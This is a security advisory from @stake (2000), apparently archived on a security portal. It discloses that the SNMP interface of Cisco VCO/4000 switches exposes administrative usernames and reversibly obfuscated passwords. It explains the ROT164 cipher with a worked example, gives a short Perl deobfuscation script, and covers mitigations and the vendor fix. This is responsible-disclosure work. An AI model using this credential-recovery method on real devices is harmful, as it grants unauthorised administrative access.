[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Cisco VCO/4000 SNMP Username and Password Retrieval

Title: Cisco VCO/4000 SNMP Username and Password Retrieval
Released by: @stake
Date: 26th October 2000
Printable version: Click here

Hash: SHA1

                              @stake, Inc.


                           Security Advisory

Advisory Name: Cisco VCO/4000 SNMP Username and Password Retrieval

 Release Date: 10/26/2000

  Application: N/A

     Platform: Cisco (Formerly Summa Four) VCO/4K software version 5.1.3 and


     Severity: An attacker can obtain login and password credentials

               to the administrative interfaces with the read-only

               community string.

    Author(s): David Goldsmith 

               Brian Carrier 

               Rex Warren 

Vendor Status: Software upgrade available

          Web: www.atstake.com/research/advisories/2000/A102600-1.txt


    This advisory describes a vulnerability that exists in Cisco Systems'

Virtual Central Office 4000 (VCO/4K).  The VCO/4K is a programmable switch

that provides numerous telephony capabilities including voice services,

switching for wireless and wireline networks, and circuit/packet-switched

network gateway services.  The VCO/4K can be administered via several

TCP/IP interfaces, including Telnet and SNMP.  There is a vulnerability in

the SNMP interface that allows an attacker to enumerate username and

obfuscated password pairs for the Telnet interface.  Since the obfuscation

method used on the passwords is reversible, administrative access to the

VCO/4K can be obtained.

Detailed Description:

    If an attacker knows the read-only community string of a VCO/4K,

then they can obtain a list of users and their obfuscated passwords.

The obfuscation can be easily reversed, allowing an attacker to obtain

additional privileges on the VCO/4K.

    The SNMP MIB of the VCO/4K contains, among other data, a list of

usernames and passwords.  These entries start at:

        [ ... ]

        enterprises.886. = "someuser"

        enterprises.886. = 0

        enterprises.886. = ".At4Cqq"

        enterprises.886. = 0

        [ ... ]

    The enterprises.886. entry is the first username, with

enterprises.886. being the corresponding (albeit obfuscated)


    The password obfuscation algorithm is a substitution cipher that

replaces each ASCII character by one that is 164 places away.  For

historical reasons, we will call this ROT164():

    ROT164(X) = 164 - X

Using the example above:

    ROT164(".") = 164 - 046 = 118 => "v"

    ROT164("A") = 164 - 065 = 099 => "c"

    ROT164("t") = 164 - 116 = 048 => "0"

    ROT164("4") = 164 - 052 = 112 => "p"

    ROT164("C") = 164 - 067 = 097 => "a"

    ROT164("q") = 164 - 113 = 051 => "3"

    ROT164("q") = 164 - 113 = 051 => "3"

Temporary Solution:

    If SNMP is not required on the VCO/4K, then disable the service.  If

it is required, then verify that the community string is difficult to

guess and that access to it is restricted.

Vendor Response:

    Cisco Systems is aware of the vulnerability reported by @stake and has

prepared two software releases to address the problem.  In Cisco VCO/4K

software version 5.1.4, the display of the usernames and encrypted

passwords has been removed from SNMP responses.  Version 5.2, to be

released in early December, also includes enhancements replacing the weak

password encryption with MD5 -- similar to Type 5 passwords in Cisco

IOS -- as well as general improvements to access control.

    The Cisco PSIRT appreciates the efforts made by @stake in

communicating this vulnerability to us and working with us to resolve it.

Proof-of-Concept Code:

    The decryption code was written in PERL by Rex Warren.  Due to the

cyclic properties of ROT164, the program accepts both the plaintext and

the obfuscated password as standard input and returns the opposite


<--- cut here --->


printf ("Cisco VCO/4K Password [De]Obfuscator\n");

printf ("\t\@stake, Inc.\n");

printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");

printf ("Enter Password: ");

$pw = ;

chop $pw;

printf("Result: ");

for ($pos = 0; $pos < length($pw); $pos++){

    printf("%s", chr(164 - ord(substr($pw, $pos, 1))));



<--- cut here --->

For more advisories: http://www.atstake.com/advisories/

PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.


Version: PGP 7.0





(C) 1999-2000 All rights reserved.